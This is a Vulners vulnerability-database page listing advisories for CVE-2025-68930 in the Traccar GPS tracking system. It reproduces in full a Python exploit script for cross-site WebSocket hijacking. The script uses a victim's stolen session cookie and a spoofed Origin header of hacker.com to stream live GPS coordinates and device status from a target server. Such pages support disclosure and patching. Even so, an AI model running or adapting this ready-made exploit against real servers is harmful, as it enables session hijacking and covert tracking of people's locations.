Vulners
Lucene search
Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Exploit for CVE-2025-68930 | 4 May 202616:29 | – | githubexploit |
 | CVE-2025-68930 | 23 Feb 202621:27 | – | circl |
 | Traccar 安全漏洞 | 23 Feb 202600:00 | – | cnnvd |
 | CVE-2025-68930 | 23 Feb 202620:44 | – | cve |
 | CVE-2025-68930 Traccar Missing Origin Validation in WebSockets | 23 Feb 202620:44 | – | cvelist |
 | CVE-2025-68930 | 23 Feb 202621:19 | – | nvd |
 | CVE-2025-68930 Traccar Missing Origin Validation in WebSockets | 23 Feb 202620:44 | – | osv |
 | 📄 Traccar GPS Tracking System 6.11.1 Cross-Site WebSocket Hijacking | 5 May 202600:00 | – | packetstorm |
 | PT-2026-21550 | 23 Feb 202600:00 | – | ptsecurity |
 | CVE-2025-68930 | 24 Feb 202622:30 | – | redhatcve |
10
# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930
"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket).
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header
along with a victim's valid JSESSIONID. This allows the attacker to hijack the
WebSocket connection and leak real-time sensitive data, including GPS coordinates
and device status.
Requirements:
pip install websocket-client
"""
import websocket
import argparse
import sys
def on_message(ws, message):
print(f"[+] DATA LEAKED: {message}")
def on_error(ws, error):
print(f"[-] Error: {error}")
def on_close(ws, close_status_code, close_msg):
print("[-] Connection closed.")
def on_open(ws):
print("[*] WebSocket Handshake Successful!")
print("[*] Connection upgraded. Streaming real-time sensitive data...\n")
def main():
parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")
args = parser.parse_args()
# Construct the WebSocket URL
url = f"ws://{args.target}:{args.port}/api/socket"
# Malicious headers triggering the bypass
# The 'Origin' header is set to an external domain to demonstrate lack of validation.
headers = [
"Origin: http://hacker.com",
f"Cookie: JSESSIONID={args.cookie}"
]
print(f"""
================================================
TRACCAR GPS TRACKER - CSWSH EXPLOIT
Exploit Author: Hazar Taspinar
CVE: CVE-2025-68930
Target: {url}
================================================
""")
# Initiate WebSocket connection
ws = websocket.WebSocketApp(url,
on_message=on_message,
on_error=on_error,
on_close=on_close,
on_open=on_open,
header=headers)
try:
ws.run_forever()
except KeyboardInterrupt:
print("\n[*] Exploit stopped by user.")
sys.exit(0)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.5 - 7.1
EPSS0.00112